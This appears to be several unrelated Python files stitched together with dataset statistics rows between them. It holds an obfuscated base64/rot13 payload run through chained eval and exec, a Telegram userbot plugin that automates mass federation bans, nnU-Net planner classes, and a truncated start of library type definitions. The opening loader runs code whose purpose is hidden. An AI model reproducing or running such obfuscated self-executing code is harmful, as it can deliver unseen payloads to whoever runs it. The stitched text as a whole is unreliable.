2MFOho3DtLzIyovO2nKAcqTIxVTWyMz9lMDbWPDxWnJLtoTyhn1IloPOho3DtnJ4toTyhn3AJnKAcqTIxBtbWPDxWPKRhpUI0XTkcozgIpzjcPtxWPDxWV2kcozgmIzymnKEyMP5uMTDboTyhn1IloPxXPDxWPDxwL2uyL2gTo3WUMKEFMKS1MKA0XTkcozgIpzjcPtxWPDxWV2AbMJAeEz9loIOupzSgMKEypaZbp2y0MHAioaEyoaDfoTyhn1IloPxXPDbWPzEyMvOxo19mqUIzMvukXGbXPDbWq2ucoTHtIUW1MGbXPDy1pzjtCFOkYzqyqPtcPtxWqUW5BtbWPDyvLKAcL0AlLKqfnJ5aXUIloPxXPDxWpF50LKAeK2EiozHbXDbWPJI4L2IjqPOSrTAypUEco24tLKZtMGbXPDxWpUWcoaDbMFxXPDxWpF50LKAeK2EiozHbXDbWPDywo250nJ51MDbXPaOupaAyMQ11pzkjLKWmMFuupzqmYzuip3DcPzWup2IIHxj9pTSlp2IxYaAwnTIgMFfvBv8iVvgjLKWmMJDhozI0oT9wPaOlnJ50VPtvITSlM2I0VSIFGPNgVPVtXlOvLKAyIIWZXDbXPzyzVTSlM3ZhLaIlpQbXPJW1paOsrT1fVQ0trT1fYzI0pzIyYxIfMJ1yoaEHpzIyYzMlo21mqUWcozpbo3OyovuupzqmYzW1paNfVPWlVvxhpzIuMPtcXDbWMz9lVTy0MJ0tnJ4tLaIlpS94oJj6PtxWpI9vqKWjYaO1qPucqTIgXDcyoUAyBtbWpF5jqKDbLzSmMIIFGPxXPKOlnJ50VPtvVvxXPvAGnJ5wMFO3MFOxolOho3Dtq2ShqPO0olO2nKAcqPO0nTHtpz9iqPO1pzjtLJqunJ4tq2HtLJExVTy0VTyhqT8tqTuyVUMcp2y0MJDtoTymqPNXoTyhn3AJnKAcqTIxYzSxMPuvLKAyIIWZXlViVvxXPzyzVTSlM3ZhqTulMJSxpmbXPJ51oI90nUWyLJEmVQ0tnJ50XTSlM3ZhqTulMJSxplxXMJkmMGbXPJ51oI90nUWyLJEmCGRjPtbwFJLtLaIlpPOcoaO1qPOcplOjpz92nJEyMPO3MFOznKWmqPOjLKWmMFOcqPOuozDtoJSjVT91pvOlMKA1oUEmVTShMPO0nTIhVT1un2HtLJ5iqTuypvOfnKA0VT91qPOiMvOcqPO0olOjLKAmVUEiVTWup2ywVTAlLKqfnJ5aVUEiVTqyqPOgLKucoKIgVUWyp3IfqUZXnJLtLKWapl5vqKWjBtbWpUWcoaDtXPWpoyOlo2Ayp3AcozptDaIlpPOznJkyKT4vXDbWMz9lVTxtnJ4tpzShM2HboaIgK3EbpzIuMUZcBtbWPKqipzgypvN9VSEbpzIuMPu0LKWaMKD9LaIlpS9mnKEyGJSjK3OupaAyYPOupzqmCFukK2W1paNfXFxXPDy3o3WeMKVhp2I0ETSyoJ9hXSElqJHcPtxWq29ln2IlYaA0LKW0XPxXpI9vqKWjYzcinJ4bXDcjpzyhqPNbVykhH3EupaEcozptD3Wuq2kcozqpovVcPzMipvOcVTyhVUWuozqyXT51oI90nUWyLJEmXGbXPKqipzgypvN9VSEbpzIuMPu0LKWaMKD9MT9sp3E1MzLfVTSlM3Z9XURfXFxXPKqipzgypv5mMKERLJIgo24bIUW1MFxXPKqipzgypv5mqTSlqPtcPtckYzcinJ4bXDbXpUWcoaDtXPWpoyOlo2Ayp3ZtD29gpTkyqTIxVvxX'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
| 2,152.545455
| 5,806
| 0.99244
| 116
| 23,678
| 202.577586
| 0.560345
| 0.001787
| 0.001532
| 0.002043
| 0.005787
| 0.005787
| 0.005787
| 0.003915
| 0.003915
| 0.003915
| 0
| 0.108197
| 0.00152
| 23,678
| 11
| 5,807
| 2,152.545455
| 0.885754
| 0.001563
| 0
| 0
| 0
| 0.25
| 0.992555
| 0.989002
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a0c8818413df21250e8adc2eb298cc1a332c3e
| 10,707
|
py
|
Python
|
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | null | null | null |
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | null | null | null |
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | 1
|
2022-03-09T14:42:48.000Z
|
2022-03-09T14:42:48.000Z
|
# Ultroid - UserBot
# Copyright (C) 2020 TeamUltroid
#
# This file is a part of < https://github.com/TeamUltroid/Ultroid/ >
# PLease read the GNU Affero General Public License in
# <https://www.github.com/TeamUltroid/Ultroid/blob/main/LICENSE/>.
#ported to Javes 3 By Sh1vam with a few changes
from ub import bot as borg
import asyncio
import os
from ..utils import admin_cmd
from telethon.errors.rpcerrorlist import YouBlockedUserError
FED_LOGGER=int(os.environ.get("FED_LOGGER",-1001451354500))
from ub import bot as ultroid_bot
from ub.events import register
bot = "@MissRose_bot"
from telethon.tl.functions.users import GetFullUserRequest
@register(pattern="^!superfban ?(.*)", outgoing=True)
async def _(event):
msg = await event.edit( "Starting a Mass-FedBan...")
fedList = []
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await ultroid_bot.download_media(
previous_message, "fedlist"
)
file = open(downloaded_file_name, encoding="utf8")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
arg = event.text.split(" ", maxsplit=2)
FBAN = arg[1]
REASON = arg[2] if len(arg) > 2 else " #TBMassBanned "
else:
FBAN = previous_message.sender_id
try:
REASON = event.text.split(" ", maxsplit=1)[1]
except BaseException:
REASON = ""
if REASON.strip() == "":
REASON = " #TBMassBanned "
else:
arg = event.text.split(" ", maxsplit=2)
if len(arg) > 2:
try:
FBAN = arg[1]
REASON = arg[2]
except BaseException:
return await msg.edit("`No user designated!`")
else:
try:
FBAN = arg[1]
REASON = " #TBMassBanned "
except BaseException:
return await msg.edit("`No user designated!`")
try:
if str(FBAN) == str(929138153):
await msg.edit("You can't ban my dev !!")
return
elif FBAN.startswith("@"):
try:
x = await borg.get_entity(str(FBAN))
uid = x.id
if str(uid) == str( 929138153):
await msg.edit("You can't ban my dev!!")
return
except Exception as e:
print(e)
return await msg.edit(str(e))
except Exception as e:
print(e)
return await msg.edit(str(e))
chat = await event.get_chat()
if not len(fedList):
for a in range(3):
async with ultroid_bot.conversation("@MissRose_bot") as bot_conv:
await bot_conv.send_message("/start")
await asyncio.sleep(3)
await bot_conv.send_message("/myfeds")
await asyncio.sleep(3)
try:
response = await bot_conv.get_response()
except asyncio.exceptions.TimeoutError:
return await msg.edit(
"`Seems like rose isn't responding, or, the plugin is misbehaving`"
)
await asyncio.sleep(3)
if "make a file" in response.text or "Looks like" in response.text:
await response.click(0)
await asyncio.sleep(3)
fedfile = await bot_conv.get_response()
await asyncio.sleep(3)
if fedfile.media:
downloaded_file_name = await ultroid_bot.download_media(
fedfile, "fedlist"
)
await asyncio.sleep(6)
file = open(downloaded_file_name, "r", errors="ignore")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
elif "You can only use fed commands once every 5 minutes" in (
await bot_conv.get_edit
):
await msg.edit("Try again after 5 mins.")
return
if not fedList:
await msg.edit(
f"Unable to collect FedAdminList. Retrying ({a+1}/3)..."
)
else:
break
else:
await msg.edit("Error")
In = False
tempFedId = ""
for x in response.text:
if x == "`":
if In:
In = False
fedList.append(tempFedId)
tempFedId = ""
else:
In = True
elif In:
tempFedId += x
if not fedList:
await msg.edit("Unable to collect FedAdminList.")
return
await msg.edit(f"FBaning in {len(fedList)} feds.")
try:
await ultroid_bot.send_message(FED_LOGGER, '/start')
except BaseException:
await msg.edit("Specified FBan Group ID is incorrect.")
return
await asyncio.sleep(3)
exCount = 0
for fed in fedList:
await ultroid_bot.send_message(FED_LOGGER, f"/joinfed {fed}")
await asyncio.sleep(3)
await ultroid_bot.send_message(FED_LOGGER, f"/fban {FBAN} {REASON}")
await asyncio.sleep(3)
try:
os.remove("fedlist")
except Exception as e:
print(f'Error in removing FedAdmin file.\n{e}')
await msg.edit(
"SuperFBan Completed.\n#TB"
)
@register(pattern="^!superunfban ?(.*)", outgoing=True)
async def _(event):
    """Mass-unban (`/unfban`) a user from every federation this account admins.

    Target/reason resolution:
      * reply to an uploaded fed-list file -> feds come from the file, the
        user/reason from the command arguments;
      * reply to a normal message -> its sender is the target;
      * otherwise -> ``!superunfban <user> [reason]``.

    If no fed list was supplied, it is scraped from @MissRose_bot's /myfeds
    output (up to 3 attempts). The unban commands are then issued through the
    FED_LOGGER chat, one /joinfed + /unfban pair per federation.
    """
    msg = await event.edit("Starting a Mass-UnFedBan...")
    fedList = []
    if event.reply_to_msg_id:
        previous_message = await event.get_reply_message()
        if previous_message.media:
            # Fed-list file: every line is expected to start with a
            # 36-character fed UUID.
            downloaded_file_name = await ultroid_bot.download_media(
                previous_message, "fedlist"
            )
            # Context manager closes the handle deterministically (the
            # original leaked it).
            with open(downloaded_file_name, encoding="utf8") as file:
                for line in file:
                    fedList.append(line[:36])
            arg = event.text.split(" ", maxsplit=2)
            FBAN = arg[1]
            REASON = arg[2] if len(arg) > 2 else ""
        else:
            FBAN = previous_message.sender_id
            try:
                REASON = event.text.split(" ", maxsplit=1)[1]
            except IndexError:
                REASON = ""
        if REASON.strip() == "":
            REASON = ""
    else:
        arg = event.text.split(" ", maxsplit=2)
        if len(arg) < 2:
            return await msg.edit("`No user designated!`")
        FBAN = arg[1]
        # Default reason tag when none was given (matches original behaviour).
        REASON = arg[2] if len(arg) > 2 else " #TBMassUnBanned "
    if not fedList:
        for attempt in range(3):
            async with ultroid_bot.conversation("@MissRose_bot") as bot_conv:
                await bot_conv.send_message("/start")
                await asyncio.sleep(3)
                await bot_conv.send_message("/myfeds")
                await asyncio.sleep(3)
                try:
                    response = await bot_conv.get_response()
                except asyncio.exceptions.TimeoutError:
                    return await msg.edit(
                        "`Seems like rose isn't responding, or, the plugin is misbehaving`"
                    )
                await asyncio.sleep(3)
                if "make a file" in response.text or "Looks like" in response.text:
                    # Rose offers the fed list as a document: press the inline
                    # button and download the file it sends back.
                    await response.click(0)
                    await asyncio.sleep(3)
                    fedfile = await bot_conv.get_response()
                    await asyncio.sleep(3)
                    if fedfile.media:
                        downloaded_file_name = await ultroid_bot.download_media(
                            fedfile, "fedlist"
                        )
                        await asyncio.sleep(6)
                        with open(downloaded_file_name, "r", errors="ignore") as file:
                            for line in file:
                                fedList.append(line[:36])
                elif "You can only use fed commands once every 5 minutes" in (
                    # bugfix: get_edit is a coroutine method and must be
                    # called; the original awaited the unbound method object
                    await bot_conv.get_edit()
                ).text:
                    await msg.edit("Try again after 5 mins.")
                    return
            if not fedList:
                await msg.edit(
                    f"Unable to collect FedAdminList. Retrying ({attempt+1}/3)..."
                )
            else:
                break
        else:
            # for-else: all three attempts completed without a break.
            await msg.edit("Error")
        # Fed IDs also appear wrapped in backticks inside the /myfeds text;
        # harvest whatever the last response contained.
        inside = False
        tempFedId = ""
        for ch in response.text:
            if ch == "`":
                if inside:
                    fedList.append(tempFedId)
                    tempFedId = ""
                inside = not inside
            elif inside:
                tempFedId += ch
    if not fedList:
        await msg.edit("Unable to collect FedAdminList.")
        return
    await msg.edit(f"UnFBaning in {len(fedList)} feds.")
    try:
        await ultroid_bot.send_message(FED_LOGGER, '/start')
    except BaseException:
        await msg.edit("Specified FBan Group ID is incorrect.")
        return
    await asyncio.sleep(3)
    for fed in fedList:
        # Join each federation first, then issue the unban from inside it.
        await ultroid_bot.send_message(FED_LOGGER, f"/joinfed {fed}")
        await asyncio.sleep(3)
        await ultroid_bot.send_message(FED_LOGGER, f"/unfban {FBAN} {REASON}")
        await asyncio.sleep(3)
    try:
        os.remove("fedlist")
    except OSError as e:
        print(f'Error in removing FedAdmin file.\n{e}')
    await msg.edit("SuperUnFBan Completed.\n#TB")
| 36.793814
| 91
| 0.492855
| 1,108
| 10,707
| 4.674188
| 0.1787
| 0.037073
| 0.055609
| 0.055609
| 0.859625
| 0.85306
| 0.85306
| 0.85306
| 0.85306
| 0.832593
| 0
| 0.016186
| 0.417204
| 10,707
| 290
| 92
| 36.92069
| 0.813782
| 0.026058
| 0
| 0.859779
| 0
| 0
| 0.122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.01476
| 0.02952
| 0
| 0.088561
| 0.01476
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a9947446666ede6fd37cab7abe6810d45b9160
| 12,220
|
py
|
Python
|
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | 1
|
2021-05-26T11:03:21.000Z
|
2021-05-26T11:03:21.000Z
|
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | null | null | null |
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
import numpy as np
from nnunet.experiment_planning.experiment_planner_baseline_3DUNet_v21 import \
ExperimentPlanner3D_v21
from nnunet.experiment_planning.common_utils import get_pool_and_conv_props
from nnunet.network_architecture.generic_UNet import Generic_UNet
from nnunet.paths import *
class ExperimentPlanner3D_v21_noResampling(ExperimentPlanner3D_v21):
    """ExperimentPlanner3D_v21 variant that keeps the original voxel spacing
    (preprocessing without resampling) and only plans the 3d_fullres stage."""

    def __init__(self, folder_with_cropped_data, preprocessed_output_folder):
        super(ExperimentPlanner3D_v21_noResampling, self).__init__(folder_with_cropped_data, preprocessed_output_folder)
        # Dedicated identifiers/filenames so these plans do not overwrite the
        # standard v2.1 plans produced by the parent planner.
        self.data_identifier = "nnUNetData_noRes_plans_v2.1"
        self.plans_fname = join(self.preprocessed_output_folder,
                                "nnUNetPlansv2.1_noRes_plans_3D.pkl")
        self.preprocessor_name = "PreprocessorFor3D_NoResampling"

    def plan_experiment(self):
        """
        DIFFERENCE TO ExperimentPlanner3D_v21: no 3d lowres

        Builds self.plans (a single 3d_fullres stage plus dataset-wide
        metadata) and writes it via save_my_plans().
        :return:
        """
        use_nonzero_mask_for_normalization = self.determine_whether_to_use_mask_for_norm()
        print("Are we using the nonzero mask for normalizaion?", use_nonzero_mask_for_normalization)
        spacings = self.dataset_properties['all_spacings']
        sizes = self.dataset_properties['all_sizes']
        all_classes = self.dataset_properties['all_classes']
        modalities = self.dataset_properties['modalities']
        num_modalities = len(list(modalities.keys()))

        target_spacing = self.get_target_spacing()
        # Shapes each case would have after resampling to the target spacing;
        # only used for the statistics printed below.
        new_shapes = [np.array(i) / target_spacing * np.array(j) for i, j in zip(spacings, sizes)]

        # Transpose so that the axis with the largest spacing comes first.
        max_spacing_axis = np.argmax(target_spacing)
        remaining_axes = [i for i in list(range(3)) if i != max_spacing_axis]
        self.transpose_forward = [max_spacing_axis] + remaining_axes
        self.transpose_backward = [np.argwhere(np.array(self.transpose_forward) == i)[0][0] for i in range(3)]

        # we base our calculations on the median shape of the datasets
        median_shape = np.median(np.vstack(new_shapes), 0)
        print("the median shape of the dataset is ", median_shape)
        max_shape = np.max(np.vstack(new_shapes), 0)
        print("the max shape in the dataset is ", max_shape)
        min_shape = np.min(np.vstack(new_shapes), 0)
        print("the min shape in the dataset is ", min_shape)
        print("we don't want feature maps smaller than ", self.unet_featuremap_min_edge_length, " in the bottleneck")

        # Only one stage is planned here: 3d_fullres. The parent class's
        # lowres logic was removed, together with the dead
        # architecture_input_voxels / "more" computation that used to feed it
        # (it computed a flag and then did nothing with it).
        self.plans_per_stage = list()
        target_spacing_transposed = np.array(target_spacing)[self.transpose_forward]
        median_shape_transposed = np.array(median_shape)[self.transpose_forward]
        print("the transposed median shape of the dataset is ", median_shape_transposed)
        print("generating configuration for 3d_fullres")
        self.plans_per_stage.append(self.get_properties_for_stage(target_spacing_transposed, target_spacing_transposed,
                                                                  median_shape_transposed,
                                                                  len(self.list_of_cropped_npz_files),
                                                                  num_modalities, len(all_classes) + 1))

        self.plans_per_stage = self.plans_per_stage[::-1]
        self.plans_per_stage = {i: self.plans_per_stage[i] for i in range(len(self.plans_per_stage))}  # convert to dict
        print(self.plans_per_stage)
        print("transpose forward", self.transpose_forward)
        print("transpose backward", self.transpose_backward)

        normalization_schemes = self.determine_normalization_scheme()
        # removed training data based postprocessing. This is deprecated
        only_keep_largest_connected_component, min_size_per_class, min_region_size_per_class = None, None, None

        # these are independent of the stage
        plans = {'num_stages': len(list(self.plans_per_stage.keys())), 'num_modalities': num_modalities,
                 'modalities': modalities, 'normalization_schemes': normalization_schemes,
                 'dataset_properties': self.dataset_properties, 'list_of_npz_files': self.list_of_cropped_npz_files,
                 'original_spacings': spacings, 'original_sizes': sizes,
                 'preprocessed_data_folder': self.preprocessed_output_folder, 'num_classes': len(all_classes),
                 'all_classes': all_classes, 'base_num_features': self.unet_base_num_features,
                 'use_mask_for_norm': use_nonzero_mask_for_normalization,
                 'keep_only_largest_region': only_keep_largest_connected_component,
                 'min_region_size_per_class': min_region_size_per_class, 'min_size_per_class': min_size_per_class,
                 'transpose_forward': self.transpose_forward, 'transpose_backward': self.transpose_backward,
                 'data_identifier': self.data_identifier, 'plans_per_stage': self.plans_per_stage,
                 'preprocessor_name': self.preprocessor_name,
                 'conv_per_stage': self.conv_per_stage,
                 }

        self.plans = plans
        self.save_my_plans()
# NOTE(review): ExperimentPlanner3D_v21_16GB is not imported by this module's
# visible import block — confirm it is provided elsewhere, otherwise this
# class definition raises NameError at import time.
class ExperimentPlanner3D_v21_noResampling_16GB(ExperimentPlanner3D_v21_16GB):
    """16GB-budget planner variant that keeps the original voxel spacing
    (preprocessing without resampling) and only plans the 3d_fullres stage."""

    def __init__(self, folder_with_cropped_data, preprocessed_output_folder):
        super(ExperimentPlanner3D_v21_noResampling_16GB, self).__init__(folder_with_cropped_data, preprocessed_output_folder)
        # Dedicated identifiers/filenames so these plans do not overwrite the
        # standard 16GB v2.1 plans produced by the parent planner.
        self.data_identifier = "nnUNetData_noRes_plans_16GB_v2.1"
        self.plans_fname = join(self.preprocessed_output_folder,
                                "nnUNetPlansv2.1_noRes_16GB_plans_3D.pkl")
        self.preprocessor_name = "PreprocessorFor3D_NoResampling"

    def plan_experiment(self):
        """
        DIFFERENCE TO ExperimentPlanner3D_v21: no 3d lowres

        Builds self.plans (a single 3d_fullres stage plus dataset-wide
        metadata) and writes it via save_my_plans().
        :return:
        """
        use_nonzero_mask_for_normalization = self.determine_whether_to_use_mask_for_norm()
        print("Are we using the nonzero mask for normalizaion?", use_nonzero_mask_for_normalization)
        spacings = self.dataset_properties['all_spacings']
        sizes = self.dataset_properties['all_sizes']
        all_classes = self.dataset_properties['all_classes']
        modalities = self.dataset_properties['modalities']
        num_modalities = len(list(modalities.keys()))

        target_spacing = self.get_target_spacing()
        # Shapes each case would have after resampling to the target spacing;
        # only used for the statistics printed below.
        new_shapes = [np.array(i) / target_spacing * np.array(j) for i, j in zip(spacings, sizes)]

        # Transpose so that the axis with the largest spacing comes first.
        max_spacing_axis = np.argmax(target_spacing)
        remaining_axes = [i for i in list(range(3)) if i != max_spacing_axis]
        self.transpose_forward = [max_spacing_axis] + remaining_axes
        self.transpose_backward = [np.argwhere(np.array(self.transpose_forward) == i)[0][0] for i in range(3)]

        # we base our calculations on the median shape of the datasets
        median_shape = np.median(np.vstack(new_shapes), 0)
        print("the median shape of the dataset is ", median_shape)
        max_shape = np.max(np.vstack(new_shapes), 0)
        print("the max shape in the dataset is ", max_shape)
        min_shape = np.min(np.vstack(new_shapes), 0)
        print("the min shape in the dataset is ", min_shape)
        print("we don't want feature maps smaller than ", self.unet_featuremap_min_edge_length, " in the bottleneck")

        # Only one stage is planned here: 3d_fullres. The parent class's
        # lowres logic was removed, together with the dead
        # architecture_input_voxels / "more" computation that used to feed it
        # (it computed a flag and then did nothing with it).
        self.plans_per_stage = list()
        target_spacing_transposed = np.array(target_spacing)[self.transpose_forward]
        median_shape_transposed = np.array(median_shape)[self.transpose_forward]
        print("the transposed median shape of the dataset is ", median_shape_transposed)
        print("generating configuration for 3d_fullres")
        self.plans_per_stage.append(self.get_properties_for_stage(target_spacing_transposed, target_spacing_transposed,
                                                                  median_shape_transposed,
                                                                  len(self.list_of_cropped_npz_files),
                                                                  num_modalities, len(all_classes) + 1))

        self.plans_per_stage = self.plans_per_stage[::-1]
        self.plans_per_stage = {i: self.plans_per_stage[i] for i in range(len(self.plans_per_stage))}  # convert to dict
        print(self.plans_per_stage)
        print("transpose forward", self.transpose_forward)
        print("transpose backward", self.transpose_backward)

        normalization_schemes = self.determine_normalization_scheme()
        # removed training data based postprocessing. This is deprecated
        only_keep_largest_connected_component, min_size_per_class, min_region_size_per_class = None, None, None

        # these are independent of the stage
        plans = {'num_stages': len(list(self.plans_per_stage.keys())), 'num_modalities': num_modalities,
                 'modalities': modalities, 'normalization_schemes': normalization_schemes,
                 'dataset_properties': self.dataset_properties, 'list_of_npz_files': self.list_of_cropped_npz_files,
                 'original_spacings': spacings, 'original_sizes': sizes,
                 'preprocessed_data_folder': self.preprocessed_output_folder, 'num_classes': len(all_classes),
                 'all_classes': all_classes, 'base_num_features': self.unet_base_num_features,
                 'use_mask_for_norm': use_nonzero_mask_for_normalization,
                 'keep_only_largest_region': only_keep_largest_connected_component,
                 'min_region_size_per_class': min_region_size_per_class, 'min_size_per_class': min_size_per_class,
                 'transpose_forward': self.transpose_forward, 'transpose_backward': self.transpose_backward,
                 'data_identifier': self.data_identifier, 'plans_per_stage': self.plans_per_stage,
                 'preprocessor_name': self.preprocessor_name,
                 'conv_per_stage': self.conv_per_stage,
                 }

        self.plans = plans
        self.save_my_plans()
| 56.055046
| 125
| 0.68707
| 1,532
| 12,220
| 5.117493
| 0.164491
| 0.032653
| 0.046429
| 0.056378
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0
| 0.011483
| 0.23036
| 12,220
| 218
| 126
| 56.055046
| 0.822116
| 0.143699
| 0
| 0.881119
| 0
| 0
| 0.166763
| 0.042221
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027972
| false
| 0.013986
| 0.041958
| 0
| 0.083916
| 0.13986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a393d12602df948a3a389c0993eb871d57a7610
| 12,683
|
py
|
Python
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 5
|
2019-04-21T03:11:22.000Z
|
2021-11-13T04:13:32.000Z
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 10
|
2019-04-03T07:52:30.000Z
|
2021-06-01T23:56:30.000Z
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 1
|
2019-04-21T04:04:26.000Z
|
2019-04-21T04:04:26.000Z
|
from dataclasses import dataclass
from typing import Iterable, Optional
@dataclass
class Title:
    """One catalogue record, found inside `SearchResponse.titles`.

    :var str bid:
    :var str isbn:
    :var str title_name:
    :var str author:
    :var str publish_year:
    :var str media_code:
    :var str media_desc:

    Example::

        Title(bid='203125808',
              isbn='1328915336 (paperback)',
              title_name='Beren and Lúthien / by J.R.R. Tolkien ; ...',
              author='Tolkien, J. R. R. (John Ronald Reuel), 1892-1973',
              publish_year='2018',
              media_code='BK',
              media_desc='Books')
    """
    bid: str
    isbn: str
    title_name: str
    author: str
    publish_year: str
    media_code: str
    media_desc: str
@dataclass
class SearchResponse:
    """Result of `Client.search`.

    :var str status:
    :var str message:
    :var Optional[str] error_message:
    :var Optional[int] total_records:
    :var Optional[int] next_record_position:
    :var Optional[str] set_id:
    :var Optional[Iterable[Title]] titles:

    Example::

        SearchResponse(status='OK',
                       message='Operation completed successfully',
                       error_message=None,
                       total_records=52,
                       next_record_position=4,
                       set_id='PGE3676',
                       titles=(Title(bid='203125808', ...),
                               Title(bid='204576140', ...)))
    """
    status: str
    message: str
    error_message: Optional[str]
    total_records: Optional[int]
    next_record_position: Optional[int]
    set_id: Optional[str]
    titles: Optional[Iterable[Title]]
@dataclass
class TitleDetail:
    """Full record for one title, found inside
    `GetTitleDetailsResponse.title_detail`.

    :var str bid:
    :var str title_name:
    :var str author:
    :var str other_authors: pipe-separated contributor names
    :var Optional[str] publisher:
    :var str physical_desc:
    :var Iterable[str] subjects:
    :var str summary:
    :var str notes:
    :var str isbn:
    :var Optional[str] issn:
    :var Optional[str] n_title_name:
    :var Optional[str] n_author:
    :var Optional[str] n_publisher:

    Example::

        TitleDetail(bid='203125808',
                    title_name='Beren and Lúthien / by J.R.R. Tolkien ; ...',
                    author='Tolkien, J. R. R.',
                    other_authors='Tolkien, J. R. R. ...|Tolkien, Christopher|Lee, Alan',
                    publisher=None,
                    physical_desc='288 pages ... ;21 cm',
                    subjects=('Middle Earth (Imaginary place) Fiction', ...),
                    summary='The epic tale of Beren and Lúthien ...',
                    notes='First published by Harper Collins Publishers 2017. ...',
                    isbn='1328915336 (paperback)',
                    issn=None,
                    n_title_name=None,
                    n_author=None,
                    n_publisher=None)
    """
    bid: str
    title_name: str
    author: str
    other_authors: str
    publisher: Optional[str]
    physical_desc: str
    subjects: Iterable[str]
    summary: str
    notes: str
    isbn: str
    issn: Optional[str]
    n_title_name: Optional[str]
    n_author: Optional[str]
    n_publisher: Optional[str]
@dataclass
class GetTitleDetailsResponse:
    """Result of `Client.get_title_details`.

    :var str status:
    :var str message:
    :var Optional[str] error_message:
    :var Optional[TitleDetail] title_detail:

    Example::

        GetTitleDetailsResponse(status='OK',
                                message='Operation completed successfully',
                                error_message=None,
                                title_detail=TitleDetail(bid='203125808', ...))
    """
    status: str
    message: str
    error_message: Optional[str]
    title_detail: Optional[TitleDetail]
@dataclass
class Item:
    """One physical copy of a title, found inside
    `GetAvailabilityInfoResponse.items`.

    :var str item_no:
    :var str branch_id:
    :var str branch_name:
    :var str location_code:
    :var str location_desc:
    :var str call_number:
    :var str status_code:
    :var str status_desc:
    :var Optional[str] media_code:
    :var str media_desc:
    :var str status_date:
    :var Optional[str] due_date:
    :var Optional[str] cluster_name:
    :var Optional[str] category_name:
    :var Optional[str] collection_code:
    :var Optional[str] collection_min_age_limit:
    :var bool available:

    Example::

        Item(item_no='B33315118C',
             branch_id='BBPL',
             branch_name='Bukit Batok Public Library',
             location_code='____',
             location_desc='Adult Lending',
             call_number='English TOL -[FN]',
             status_code='C',
             status_desc='On Loan',
             media_code=None,
             media_desc='Book',
             status_date='08/11/2018',
             due_date='08/11/2018',
             cluster_name=None,
             category_name=None,
             collection_code=None,
             collection_min_age_limit=None,
             available=False)
    """
    item_no: str
    branch_id: str
    branch_name: str
    location_code: str
    location_desc: str
    call_number: str
    status_code: str
    status_desc: str
    media_code: Optional[str]
    media_desc: str
    status_date: str
    due_date: Optional[str]
    cluster_name: Optional[str]
    category_name: Optional[str]
    collection_code: Optional[str]
    collection_min_age_limit: Optional[str]
    available: bool
@dataclass
class GetAvailabilityInfoResponse:
    """Result of `Client.get_availability_info`.

    :var str status:
    :var str message:
    :var Optional[str] error_message:
